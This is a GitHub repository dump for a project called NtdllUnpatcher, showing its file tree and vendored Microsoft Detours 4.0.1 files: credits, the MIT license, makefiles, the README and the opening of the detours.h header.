├── Detours-master ├── .vs │ └── system │ │ └── v15 │ │ └── .suo ├── CREDITS.TXT ├── LICENSE.md ├── Makefile ├── README.md ├── UpgradeLog.htm ├── include │ ├── detours.h │ ├── detver.h │ └── syelog.h ├── lib.X64 │ ├── detours.lib │ ├── detours.pdb │ └── syelog.lib ├── src │ ├── Makefile │ ├── creatwth.cpp │ ├── detours.cpp │ ├── detours.h │ ├── detver.h │ ├── disasm.cpp │ ├── disolarm.cpp │ ├── disolarm64.cpp │ ├── disolia64.cpp │ ├── disolx64.cpp │ ├── disolx86.cpp │ ├── image.cpp │ ├── modules.cpp │ ├── obj.X64 │ │ ├── creatwth.obj │ │ ├── detours.obj │ │ ├── disasm.obj │ │ ├── disolarm.obj │ │ ├── disolarm64.obj │ │ ├── disolia64.obj │ │ ├── disolx64.obj │ │ ├── disolx86.obj │ │ ├── image.obj │ │ └── modules.obj │ └── uimports.cpp └── system.mak ├── NtdllUnpatcher.sln ├── NtdllUnpatcher ├── NtdllUnpatcher.cpp ├── NtdllUnpatcher.h ├── NtdllUnpatcher.vcxproj ├── NtdllUnpatcher.vcxproj.filters ├── NtdllUnpatcher.vcxproj.user ├── targetver.h └── x64 │ ├── Debug │ ├── NtdllUnpatcher.Build.CppClean.log │ ├── NtdllUnpatcher.log │ ├── NtdllUnpatcher.pch │ ├── NtdllUnpatcher.tlog │ │ ├── CL.command.1.tlog │ │ ├── CL.read.1.tlog │ │ ├── CL.write.1.tlog │ │ ├── NtdllUnpatcher.lastbuildstate │ │ ├── link-cvtres.read.1.tlog │ │ ├── link-cvtres.write.1.tlog │ │ ├── link-mt.read.1.tlog │ │ ├── link-mt.write.1.tlog │ │ ├── link-rc.read.1.tlog │ │ ├── link-rc.write.1.tlog │ │ ├── link.command.1.tlog │ │ ├── link.read.1.tlog │ │ ├── link.write.1.tlog │ │ └── unsuccessfulbuild │ ├── stdafx.obj │ ├── vc141.idb │ └── vc141.pdb │ └── Release │ ├── NtdllUnpatcher.Build.CppClean.log │ ├── NtdllUnpatcher.log │ ├── NtdllUnpatcher.obj │ ├── NtdllUnpatcher.tlog │ ├── CL.command.1.tlog │ ├── CL.read.1.tlog │ ├── CL.write.1.tlog │ ├── NtdllUnpatcher.lastbuildstate │ ├── NtdllUnpatcher.write.1u.tlog │ ├── link.command.1.tlog │ ├── link.read.1.tlog │ └── link.write.1.tlog │ └── vc141.pdb ├── NtdllUnpatcher_Injector ├── NtdllUnpatcher_Injector.cpp ├── NtdllUnpatcher_Injector.vcxproj ├── NtdllUnpatcher_Injector.vcxproj.filters ├── NtdllUnpatcher_Injector.vcxproj.user └── x64 │ ├── Debug │ ├── NtdllUnp.59AE6F00.tlog │ │ ├── CL.command.1.tlog │ │ ├── CL.read.1.tlog │ │ ├── CL.write.1.tlog │ │ ├── NtdllUnpatcher_Injector.lastbuildstate │ │ ├── link.command.1.tlog │ │ ├── link.read.1.tlog │ │ └── link.write.1.tlog │ ├── NtdllUnpatcher_Injector.log │ ├── NtdllUnpatcher_Injector.obj │ ├── vc141.idb │ └── vc141.pdb │ └── Release │ ├── NtdllUnp.59AE6F00.tlog │ ├── CL.command.1.tlog │ ├── CL.read.1.tlog │ ├── CL.write.1.tlog │ ├── NtdllUnpatcher_Injector.lastbuildstate │ ├── NtdllUnpatcher_Injector.write.1u.tlog │ ├── link.command.1.tlog │ ├── link.read.1.tlog │ └── link.write.1.tlog │ ├── NtdllUnpatcher_Injector.Build.CppClean.log │ ├── NtdllUnpatcher_Injector.log │ ├── NtdllUnpatcher_Injector.obj │ └── vc141.pdb ├── README.md └── x64 └── Release ├── NtdllUnpatcher.dll ├── NtdllUnpatcher.lib └── NtdllUnpatcher_Injector.exe /Detours-master/.vs/system/v15/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/Detours-master/.vs/system/v15/.suo -------------------------------------------------------------------------------- /Detours-master/CREDITS.TXT: -------------------------------------------------------------------------------- 1 | ============================================================================== 2 | The following individuals have helped identify specific bugs and improvements 3 | in Detours. The entire Detours community has benefited from their help. 4 | ============================================================================== 5 | 6 | * Jay Krell: Identified issue with VirtualSize == 0 files created in 7 | NT 3.1 images. (Build_339) 8 | 9 | * Igor Odnovorov: Identified an issue with the placement of the trampoline 10 | region when a function is detoured twice and the second 11 | trampoline region is outside of the +/- 2GB range of 12 | the target. (Build_337) 13 | 14 | * Jay Krell: Identified need for some programs to enumerate the 15 | address of IAT entries. (Build_336) 16 | 17 | * Calvin Hsia: Identified need for some program to change the excluded 18 | system region. (Build_336) 19 | 20 | * Adam Smith: Identified error in failure handling when VirtualProect 21 | cannot make pages executable because the Prohibit 22 | Dynamic Code Generation mitigation policy has been 23 | applied to a process. (Build_335) 24 | 25 | * Ben Faull: Identified fix to detour_alloc_region_from_lo and 26 | detour_alloc_region_from_hi that preserves ASLR entropy. 27 | (Build_334) 28 | 29 | * Shaoxiang Su: Reported errors building with Visual Studio 2015. 30 | (Build_332) 31 | 32 | * Jay Krell: Identified and resolved significant gaps in the X86, X64 33 | and IA64 disassemblers for instruction found in code, 34 | but seldom found in function prologues. (Build_331) 35 | 36 | * Allan Murphy: Identify error in rep and jmp ds: encodings. (Build_331) 37 | 38 | * Philip Bacon: Identified incorrect entry point return for pure 39 | resource-only binaries. (Build_330) 40 | 41 | * Jay Krell: Identified failure in DetourAttachEx to update nAlign. 42 | (Build_330) 43 | 44 | * Sumit Sarin: Helped debug error with packed binaries. 45 | (Build_329) 46 | 47 | * Nitya Kumar Sharma: Reported bug in DetourAfterWithDll for 32/64 agnostic 48 | EXEs. 49 | (Build_327) 50 | 51 | * Richard Black: Identified a large number of typos in documentation. 52 | (Build_326) 53 | 54 | * Michael Bilodeau: Identified bug in DetourUpdateProcessWithDll when the 55 | target process contains a Detours payload *after* all 56 | valid PE binaries. 57 | (Build_324) 58 | 59 | * Meera Jindal: Reported bug in identification of target address in 60 | DetourCopyInstruction for jmp[] and call[] on x86 & x64, 61 | the ff15 and ff25 opcodes. 62 | (Build_323) 63 | 64 | * Ken Johnson: Assistance with SAL 2.0 annotations. 65 | (Build_319) 66 | 67 | * Nick Wood: Identified bug in DetourFindFunction on ARM. 68 | (Build_314) 69 | 70 | * Mark Russinovich: Helped debug DetourCreateProcessWithDllEx. 71 | (Build_314) 72 | 73 | * John Lin: Implementation idea for DetoursCreateProcessWithDllEx. 74 | (Build_314) 75 | 76 | * Andrew Zawadowskiy Reported an improper memory page permissions 77 | vulnerability in Detours 2.1. (Vulnerability does not 78 | exist in versions later than Detours 2.1.) 79 | (Build_223) 80 | 81 | * Nightxie: Identified bug in detour_alloc_round_up_to_region. 82 | (Build_310) 83 | 84 | * Diana Milirud: Identified bug in B* instructions on ARM. 85 | (Build_309) 86 | 87 | * Juan Carlos Identified correct MSIL entry point for unsigned MSIL. 88 | Luciani: (Build_308) 89 | 90 | * Lee Hunt Suggested improvements in algorithm for allocation of 91 | Lawrence Landauer trampoline regions on x64 to avoid collisions with 92 | Joe Laughlin: system DLLs. 93 | (Build_307) 94 | 95 | * Tyler Sims Identified bug in handling of "anycpu" MSIL binaries 96 | Darren Kennedy: on x64. 97 | (Build_307) 98 | 99 | * Andre Vachon: Help with optimized binaries. 100 | (Build 301) 101 | 102 | * Chris Mann: Identified fix not forward ported from 2.2 to 3.0. 103 | (Build_301) 104 | 105 | * Mark Irving: Identified bug with EXEs missing second import table. 106 | (Build_300) 107 | 108 | * Ben Schwarz: Identified bug in handling of multi-byte NOPs. 109 | (Build_300) 110 | 111 | * Aaron Giles Coded initial ARM/Thumb2 disassembler. 112 | Jared Henderson: (Build_300) 113 | 114 | * Doug Brubacher: Coded initial x86 disassembler. 115 | (Build_100) 116 | -------------------------------------------------------------------------------- /Detours-master/LICENSE.md: -------------------------------------------------------------------------------- 1 | # Copyright (c) Microsoft Corporation 2 | 3 | All rights reserved. 4 | 5 | # MIT License 6 | 7 | Permission is hereby granted, free of charge, to any person obtaining a copy of 8 | this software and associated documentation files (the "Software"), to deal in 9 | the Software without restriction, including without limitation the rights to 10 | use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies 11 | of the Software, and to permit persons to whom the Software is furnished to do 12 | so, subject to the following conditions: 13 | 14 | The above copyright notice and this permission notice shall be included in all 15 | copies or substantial portions of the Software. 16 | 17 | THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 23 | SOFTWARE. 24 | -------------------------------------------------------------------------------- /Detours-master/Makefile: -------------------------------------------------------------------------------- 1 | ############################################################################## 2 | ## 3 | ## Makefile for Detours. 4 | ## 5 | ## Microsoft Research Detours Package 6 | ## 7 | ## Copyright (c) Microsoft Corporation. All rights reserved. 8 | ## 9 | 10 | ROOT = . 11 | !include "$(ROOT)\system.mak" 12 | 13 | all: 14 | cd "$(MAKEDIR)" 15 | @if exist "$(MAKEDIR)\core\makefile" cd "$(MAKEDIR)\core" && $(MAKE) /NOLOGO /$(MAKEFLAGS) 16 | cd "$(MAKEDIR)\src" 17 | @$(MAKE) /NOLOGO /$(MAKEFLAGS) 18 | cd "$(MAKEDIR)\samples" 19 | @$(MAKE) /NOLOGO /$(MAKEFLAGS) 20 | @if exist "$(MAKEDIR)\bugs\makefile" cd "$(MAKEDIR)\bugs" && $(MAKE) /NOLOGO /$(MAKEFLAGS) 21 | cd "$(MAKEDIR)" 22 | 23 | clean: 24 | cd "$(MAKEDIR)" 25 | @if exist "$(MAKEDIR)\core\makefile" cd "$(MAKEDIR)\core" && $(MAKE) /NOLOGO /$(MAKEFLAGS) clean 26 | cd "$(MAKEDIR)\src" 27 | @$(MAKE) /NOLOGO /$(MAKEFLAGS) clean 28 | cd "$(MAKEDIR)\samples" 29 | @$(MAKE) /NOLOGO /$(MAKEFLAGS) clean 30 | @if exist "$(MAKEDIR)\bugs\makefile" cd "$(MAKEDIR)\bugs" && $(MAKE) /NOLOGO /$(MAKEFLAGS) clean 31 | cd "$(MAKEDIR)" 32 | 33 | realclean: clean 34 | cd "$(MAKEDIR)" 35 | @if exist "$(MAKEDIR)\core\makefile" cd "$(MAKEDIR)\core" && $(MAKE) /NOLOGO /$(MAKEFLAGS) realclean 36 | cd "$(MAKEDIR)\src" 37 | @$(MAKE) /NOLOGO /$(MAKEFLAGS) realclean 38 | cd "$(MAKEDIR)\samples" 39 | @$(MAKE) /NOLOGO /$(MAKEFLAGS) realclean 40 | @if exist "$(MAKEDIR)\bugs\makefile" cd "$(MAKEDIR)\bugs" && $(MAKE) /NOLOGO /$(MAKEFLAGS) realclean 41 | cd "$(MAKEDIR)" 42 | -rmdir /q /s $(INCDS) 2> nul 43 | -rmdir /q /s $(LIBDS) 2> nul 44 | -rmdir /q /s $(BINDS) 2> nul 45 | -rmdir /q /s dist 2> nul 46 | -del docsrc\detours.chm 2> nul 47 | -del /q *.msi 2>nul 48 | -del /q /f /s *~ 2>nul 49 | 50 | test: 51 | cd "$(MAKEDIR)\samples" 52 | @$(MAKE) /NOLOGO /$(MAKEFLAGS) test 53 | cd "$(MAKEDIR)" 54 | 55 | ################################################################# End of File. 56 | -------------------------------------------------------------------------------- /Detours-master/README.md: -------------------------------------------------------------------------------- 1 | # Microsoft Research Detours Package 2 | 3 | Detours is a software package for monitoring and instrumenting API calls on Windows. Detours 4 | has been used by many ISVs and is also used by product teams at Microsoft. Detours is now available under 5 | a standard open source license (MIT). This simplifies licensing for programmers using Detours 6 | and allows the community to support Detours using open source tools and processes. 7 | 8 | Detours is compatible with the Windows NT family of 9 | operating systems: Windows NT, Windows XP, Windows Server 2003, Windows 7, 10 | Windows 8, and Windows 10. It cannot be used by Window Store apps 11 | because Detours requires APIs not available to those applications. 12 | This repo contains the source code for version 4.0.1 of Detours. 13 | 14 | For technical documentation on Detours, see the [Detours Wiki](https://github.com/microsoft/Detours/wiki). 15 | For directions on how to build and run samples, see the 16 | samples [README.txt](https://github.com/Microsoft/Detours/blob/master/samples/README.TXT) file. 17 | 18 | ## Contributing 19 | 20 | The [`Detours`](https://github.com/microsoft/detours) repository is where development is done. 21 | Here are some ways you can participate in the project: 22 | 23 | * [Answer questions](https://github.com/microsoft/detours/issues) about using Detours. 24 | * [Improve the Wiki](https://github.com/microsoft/detours/wiki). 25 | * [Submit bugs](https://github.com/microsoft/detours/issues) and help us verify fixes and changes as they are checked in. 26 | * Review [source code changes](https://github.com/microsoft/detours/pulls). 27 | 28 | This project has adopted the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/). For more information see the [Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/) or contact [opencode@microsoft.com](mailto:opencode@microsoft.com) with any additional questions or comments. 29 | 30 | ## Issues, questions, and feedback 31 | 32 | * Open an issue on [GitHub Issues](https://github.com/Microsoft/detours/issues). 33 | 34 | ## Mailing list for announcements 35 | 36 | The detours-announce mailing list is a low-traffic email list for important announcements 37 | about the project, such as the availability of new versions of Detours. To join it, send 38 | an email to listserv@lists.research.microsoft.com with a 39 | message body containing only the text SUBSCRIBE DETOURS-ANNOUNCE. 40 | To leave it, send an email to listserv@lists.research.microsoft.com with a 41 | message body containing only the text UNSUBSCRIBE DETOURS-ANNOUNCE. 42 | 43 | 44 | ## License 45 | 46 | Copyright (c) Microsoft Corporation. All rights reserved. 47 | 48 | Licensed under the [MIT](LICENSE.txt) License. 49 | -------------------------------------------------------------------------------- /Detours-master/UpgradeLog.htm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/Detours-master/UpgradeLog.htm -------------------------------------------------------------------------------- /Detours-master/include/detver.h: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Common version parameters. 4 | // 5 | // Microsoft Research Detours Package, Version 4.0.1 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #define _USING_V110_SDK71_ 1 11 | #include "winver.h" 12 | #if 0 13 | #include 14 | #include 15 | #else 16 | #ifndef DETOURS_STRINGIFY 17 | #define DETOURS_STRINGIFY(x) DETOURS_STRINGIFY_(x) 18 | #define DETOURS_STRINGIFY_(x) #x 19 | #endif 20 | 21 | #define VER_FILEFLAGSMASK 0x3fL 22 | #define VER_FILEFLAGS 0x0L 23 | #define VER_FILEOS 0x00040004L 24 | #define VER_FILETYPE 0x00000002L 25 | #define VER_FILESUBTYPE 0x00000000L 26 | #endif 27 | #define VER_DETOURS_BITS DETOUR_STRINGIFY(DETOURS_BITS) 28 | -------------------------------------------------------------------------------- /Detours-master/include/syelog.h: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detours Test Program (syelog.h of syelog.lib) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | #pragma once 10 | #ifndef _SYELOGD_H_ 11 | #define _SYELOGD_H_ 12 | #include 13 | 14 | #pragma pack(push, 1) 15 | #pragma warning(push) 16 | #pragma warning(disable: 4200) 17 | 18 | ////////////////////////////////////////////////////////////////////////////// 19 | // 20 | // 21 | #define SYELOG_PIPE_NAMEA "\\\\.\\pipe\\syelog" 22 | #define SYELOG_PIPE_NAMEW L"\\\\.\\pipe\\syelog" 23 | #ifdef UNICODE 24 | #define SYELOG_PIPE_NAME SYELOG_PIPE_NAMEW 25 | #else 26 | #define SYELOG_PIPE_NAME SYELOG_PIPE_NAMEA 27 | #endif 28 | 29 | ////////////////////////////////////////////////////////////////////////////// 30 | // 31 | #define SYELOG_MAXIMUM_MESSAGE 4086 // 4096 - sizeof(header stuff) 32 | 33 | typedef struct _SYELOG_MESSAGE 34 | { 35 | USHORT nBytes; 36 | BYTE nFacility; 37 | BYTE nSeverity; 38 | DWORD nProcessId; 39 | FILETIME ftOccurance; 40 | BOOL fTerminate; 41 | CHAR szMessage[SYELOG_MAXIMUM_MESSAGE]; 42 | } SYELOG_MESSAGE, *PSYELOG_MESSAGE; 43 | 44 | 45 | // Facility Codes. 46 | // 47 | #define SYELOG_FACILITY_KERNEL 0x10 // OS Kernel 48 | #define SYELOG_FACILITY_SECURITY 0x20 // OS Security 49 | #define SYELOG_FACILITY_LOGGING 0x30 // OS Logging-internal 50 | #define SYELOG_FACILITY_SERVICE 0x40 // User-mode system daemon 51 | #define SYELOG_FACILITY_APPLICATION 0x50 // User-mode application 52 | #define SYELOG_FACILITY_USER 0x60 // User self-generated. 53 | #define SYELOG_FACILITY_LOCAL0 0x70 // Locally defined. 54 | #define SYELOG_FACILITY_LOCAL1 0x71 // Locally defined. 55 | #define SYELOG_FACILITY_LOCAL2 0x72 // Locally defined. 56 | #define SYELOG_FACILITY_LOCAL3 0x73 // Locally defined. 57 | #define SYELOG_FACILITY_LOCAL4 0x74 // Locally defined. 58 | #define SYELOG_FACILITY_LOCAL5 0x75 // Locally defined. 59 | #define SYELOG_FACILITY_LOCAL6 0x76 // Locally defined. 60 | #define SYELOG_FACILITY_LOCAL7 0x77 // Locally defined. 61 | #define SYELOG_FACILITY_LOCAL8 0x78 // Locally defined. 62 | #define SYELOG_FACILITY_LOCAL9 0x79 // Locally defined. 63 | 64 | // Severity Codes. 65 | // 66 | #define SYELOG_SEVERITY_FATAL 0x00 // System is dead. 67 | #define SYELOG_SEVERITY_ALERT 0x10 // Take action immediately. 68 | #define SYELOG_SEVERITY_CRITICAL 0x20 // Critical condition. 69 | #define SYELOG_SEVERITY_ERROR 0x30 // Error 70 | #define SYELOG_SEVERITY_WARNING 0x40 // Warning 71 | #define SYELOG_SEVERITY_NOTICE 0x50 // Significant condition. 72 | #define SYELOG_SEVERITY_INFORMATION 0x60 // Informational 73 | #define SYELOG_SEVERITY_AUDIT_FAIL 0x66 // Audit Failed 74 | #define SYELOG_SEVERITY_AUDIT_PASS 0x67 // Audit Succeeeded 75 | #define SYELOG_SEVERITY_DEBUG 0x70 // Debugging 76 | 77 | // Logging Functions. 78 | // 79 | VOID SyelogOpen(PCSTR pszIdentifier, BYTE nFacility); 80 | VOID Syelog(BYTE nSeverity, PCSTR pszMsgf, ...); 81 | VOID SyelogV(BYTE nSeverity, PCSTR pszMsgf, va_list args); 82 | VOID SyelogClose(BOOL fTerminate); 83 | 84 | #pragma warning(pop) 85 | #pragma pack(pop) 86 | 87 | #endif // _SYELOGD_H_ 88 | // 89 | ///////////////////////////////////////////////////////////////// End of File. 90 | -------------------------------------------------------------------------------- /Detours-master/lib.X64/detours.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/Detours-master/lib.X64/detours.lib -------------------------------------------------------------------------------- /Detours-master/lib.X64/detours.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/Detours-master/lib.X64/detours.pdb -------------------------------------------------------------------------------- /Detours-master/lib.X64/syelog.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/Detours-master/lib.X64/syelog.lib -------------------------------------------------------------------------------- /Detours-master/src/Makefile: -------------------------------------------------------------------------------- 1 | ############################################################################## 2 | ## 3 | ## Makefile for Detours. 4 | ## 5 | ## Microsoft Research Detours Package, Version 4.0.1 6 | ## 7 | ## Copyright (c) Microsoft Corporation. All rights reserved. 8 | ## 9 | 10 | ROOT = .. 11 | !include "$(ROOT)\system.mak" 12 | 13 | !IF "$(DETOURS_SOURCE_BROWSING)" == "" 14 | DETOURS_SOURCE_BROWSING = 0 15 | !ENDIF 16 | 17 | #######################/####################################################### 18 | ## 19 | CFLAGS=/W4 /WX /Zi /MT /Gy /Gm- /Zl /Od 20 | 21 | !IF $(DETOURS_SOURCE_BROWSING)==1 22 | CFLAGS=$(CFLAGS) /FR 23 | !ELSE 24 | CFLAGS=$(CFLAGS) /DWIN32_LEAN_AND_MEAN /D_WIN32_WINNT=0x501 25 | !ENDIF 26 | 27 | !IF "$(DETOURS_TARGET_PROCESSOR)" == "IA64" 28 | CFLAGS=$(CFLAGS) /wd4163 # intrinsic rdtebex not available; using newer Windows headers with older compiler 29 | !ENDIF 30 | 31 | !if defined(DETOURS_WIN_7) && defined(DETOURS_CL_17_OR_NEWER) 32 | CFLAGS=$(CFLAGS) /D_USING_V110_SDK71_ 33 | !elseif defined(DETOURS_ANALYZE) 34 | CFLAGS=$(CFLAGS) /analyze 35 | !endif 36 | 37 | OBJS = \ 38 | $(OBJD)\detours.obj \ 39 | $(OBJD)\modules.obj \ 40 | $(OBJD)\disasm.obj \ 41 | $(OBJD)\image.obj \ 42 | $(OBJD)\creatwth.obj \ 43 | $(OBJD)\disolx86.obj \ 44 | $(OBJD)\disolx64.obj \ 45 | $(OBJD)\disolia64.obj \ 46 | $(OBJD)\disolarm.obj \ 47 | $(OBJD)\disolarm64.obj \ 48 | 49 | ############################################################################## 50 | ## 51 | .SUFFIXES: .cpp .h .obj 52 | 53 | !ifdef DETOURS_ANALYZE 54 | .cpp{$(OBJD)}.obj: 55 | $(CC) $(CFLAGS) /Fd$(LIBD)\detours.pdb /Fo$(OBJD)\ /c $< 56 | !else 57 | .cpp{$(OBJD)}.obj:: 58 | $(CC) $(CFLAGS) /Fd$(LIBD)\detours.pdb /Fo$(OBJD)\ /c $< 59 | !endif 60 | 61 | ############################################################################## 62 | 63 | all: dirs \ 64 | $(LIBD)\detours.lib \ 65 | $(INCD)\detours.h \ 66 | $(INCD)\detver.h \ 67 | !IF $(DETOURS_SOURCE_BROWSING)==1 68 | $(OBJD)\detours.bsc \ 69 | !endif 70 | 71 | ############################################################################## 72 | 73 | clean: 74 | -del *~ 2>nul 75 | -del $(LIBD)\detours.pdb $(LIBD)\detours.lib 2>nul 76 | -rmdir /q /s $(OBJD) 2>nul 77 | 78 | realclean: clean 79 | -rmdir /q /s $(OBJDS) 2>nul 80 | 81 | ############################################################################## 82 | 83 | dirs: 84 | @if not exist "$(INCD)" mkdir "$(INCD)" && echo. Created $(INCD) 85 | @if not exist "$(LIBD)" mkdir "$(LIBD)" && echo. Created $(LIBD) 86 | @if not exist "$(BIND)" mkdir "$(BIND)" && echo. Created $(BIND) 87 | @if not exist "$(OBJD)" mkdir "$(OBJD)" && echo. Created $(OBJD) 88 | 89 | $(OBJD)\detours.bsc : $(OBJS) 90 | bscmake /v /n /o $@ $(OBJS:.obj=.sbr) 91 | 92 | $(LIBD)\detours.lib : $(OBJS) 93 | link /lib /out:$@ $(OBJS) 94 | 95 | $(INCD)\detours.h : detours.h 96 | copy detours.h $@ 97 | 98 | $(INCD)\detver.h : detver.h 99 | copy detver.h $@ 100 | 101 | $(OBJD)\detours.obj : detours.cpp detours.h 102 | $(OBJD)\modules.obj : modules.cpp detours.h 103 | $(OBJD)\disasm.obj : disasm.cpp detours.h 104 | $(OBJD)\image.obj : image.cpp detours.h 105 | $(OBJD)\creatwth.obj : creatwth.cpp uimports.cpp detours.h 106 | $(OBJD)\disolx86.obj: disasm.cpp detours.h 107 | $(OBJD)\disolx64.obj: disasm.cpp detours.h 108 | $(OBJD)\disolia64.obj: disasm.cpp detours.h 109 | $(OBJD)\disolarm.obj: disasm.cpp detours.h 110 | $(OBJD)\disolarm64.obj: disasm.cpp detours.h 111 | 112 | test: all 113 | cd $(MAKEDIR)\..\samples\slept 114 | nmake /nologo test 115 | cd $(MAKEDIR) 116 | 117 | ################################################################# End of File. 118 | -------------------------------------------------------------------------------- /Detours-master/src/detours.h: -------------------------------------------------------------------------------- 1 | ///////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Core Detours Functionality (detours.h of detours.lib) 4 | // 5 | // Microsoft Research Detours Package, Version 4.0.1 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #pragma once 11 | #ifndef _DETOURS_H_ 12 | #define _DETOURS_H_ 13 | 14 | #define DETOURS_VERSION 0x4c0c1 // 0xMAJORcMINORcPATCH 15 | 16 | ////////////////////////////////////////////////////////////////////////////// 17 | // 18 | 19 | #undef DETOURS_X64 20 | #undef DETOURS_X86 21 | #undef DETOURS_IA64 22 | #undef DETOURS_ARM 23 | #undef DETOURS_ARM64 24 | #undef DETOURS_BITS 25 | #undef DETOURS_32BIT 26 | #undef DETOURS_64BIT 27 | 28 | #if defined(_X86_) 29 | #define DETOURS_X86 30 | #define DETOURS_OPTION_BITS 64 31 | 32 | #elif defined(_AMD64_) 33 | #define DETOURS_X64 34 | #define DETOURS_OPTION_BITS 32 35 | 36 | #elif defined(_IA64_) 37 | #define DETOURS_IA64 38 | #define DETOURS_OPTION_BITS 32 39 | 40 | #elif defined(_ARM_) 41 | #define DETOURS_ARM 42 | 43 | #elif defined(_ARM64_) 44 | #define DETOURS_ARM64 45 | 46 | #else 47 | #error Unknown architecture (x86, amd64, ia64, arm, arm64) 48 | #endif 49 | 50 | #ifdef _WIN64 51 | #undef DETOURS_32BIT 52 | #define DETOURS_64BIT 1 53 | #define DETOURS_BITS 64 54 | // If all 64bit kernels can run one and only one 32bit architecture. 55 | //#define DETOURS_OPTION_BITS 32 56 | #else 57 | #define DETOURS_32BIT 1 58 | #undef DETOURS_64BIT 59 | #define DETOURS_BITS 32 60 | // If all 64bit kernels can run one and only one 32bit architecture. 61 | //#define DETOURS_OPTION_BITS 32 62 | #endif 63 | 64 | #define VER_DETOURS_BITS DETOUR_STRINGIFY(DETOURS_BITS) 65 | 66 | ////////////////////////////////////////////////////////////////////////////// 67 | // 68 | 69 | #if (_MSC_VER < 1299) 70 | typedef LONG LONG_PTR; 71 | typedef ULONG ULONG_PTR; 72 | #endif 73 | 74 | ///////////////////////////////////////////////// SAL 2.0 Annotations w/o SAL. 75 | // 76 | // These definitions are include so that Detours will build even if the 77 | // compiler doesn't have full SAL 2.0 support. 78 | // 79 | #ifndef DETOURS_DONT_REMOVE_SAL_20 80 | 81 | #ifdef DETOURS_TEST_REMOVE_SAL_20 82 | #undef _Analysis_assume_ 83 | #undef _Benign_race_begin_ 84 | #undef _Benign_race_end_ 85 | #undef _Field_range_ 86 | #undef _Field_size_ 87 | #undef _In_ 88 | #undef _In_bytecount_ 89 | #undef _In_count_ 90 | #undef _In_opt_ 91 | #undef _In_opt_bytecount_ 92 | #undef _In_opt_count_ 93 | #undef _In_opt_z_ 94 | #undef _In_range_ 95 | #undef _In_reads_ 96 | #undef _In_reads_bytes_ 97 | #undef _In_reads_opt_ 98 | #undef _In_reads_opt_bytes_ 99 | #undef _In_reads_or_z_ 100 | #undef _In_z_ 101 | #undef _Inout_ 102 | #undef _Inout_opt_ 103 | #undef _Inout_z_count_ 104 | #undef _Out_ 105 | #undef _Out_opt_ 106 | #undef _Out_writes_ 107 | #undef _Outptr_result_maybenull_ 108 | #undef _Readable_bytes_ 109 | #undef _Success_ 110 | #undef _Writable_bytes_ 111 | #undef _Pre_notnull_ 112 | #endif 113 | 114 | #if defined(_Deref_out_opt_z_) && !defined(_Outptr_result_maybenull_) 115 | #define _Outptr_result_maybenull_ _Deref_out_opt_z_ 116 | #endif 117 | 118 | #if defined(_In_count_) && !defined(_In_reads_) 119 | #define _In_reads_(x) _In_count_(x) 120 | #endif 121 | 122 | #if defined(_In_opt_count_) && !defined(_In_reads_opt_) 123 | #define _In_reads_opt_(x) _In_opt_count_(x) 124 | #endif 125 | 126 | #if defined(_In_opt_bytecount_) && !defined(_In_reads_opt_bytes_) 127 | #define _In_reads_opt_bytes_(x) _In_opt_bytecount_(x) 128 | #endif 129 | 130 | #if defined(_In_bytecount_) && !defined(_In_reads_bytes_) 131 | #define _In_reads_bytes_(x) _In_bytecount_(x) 132 | #endif 133 | 134 | #ifndef _In_ 135 | #define _In_ 136 | #endif 137 | 138 | #ifndef _In_bytecount_ 139 | #define _In_bytecount_(x) 140 | #endif 141 | 142 | #ifndef _In_count_ 143 | #define _In_count_(x) 144 | #endif 145 | 146 | #ifndef _In_opt_ 147 | #define _In_opt_ 148 | #endif 149 | 150 | #ifndef _In_opt_bytecount_ 151 | #define _In_opt_bytecount_(x) 152 | #endif 153 | 154 | #ifndef _In_opt_count_ 155 | #define _In_opt_count_(x) 156 | #endif 157 | 158 | #ifndef _In_opt_z_ 159 | #define _In_opt_z_ 160 | #endif 161 | 162 | #ifndef _In_range_ 163 | #define _In_range_(x,y) 164 | #endif 165 | 166 | #ifndef _In_reads_ 167 | #define _In_reads_(x) 168 | #endif 169 | 170 | #ifndef _In_reads_bytes_ 171 | #define _In_reads_bytes_(x) 172 | #endif 173 | 174 | #ifndef _In_reads_opt_ 175 | #define _In_reads_opt_(x) 176 | #endif 177 | 178 | #ifndef _In_reads_opt_bytes_ 179 | #define _In_reads_opt_bytes_(x) 180 | #endif 181 | 182 | #ifndef _In_reads_or_z_ 183 | #define _In_reads_or_z_ 184 | #endif 185 | 186 | #ifndef _In_z_ 187 | #define _In_z_ 188 | #endif 189 | 190 | #ifndef _Inout_ 191 | #define _Inout_ 192 | #endif 193 | 194 | 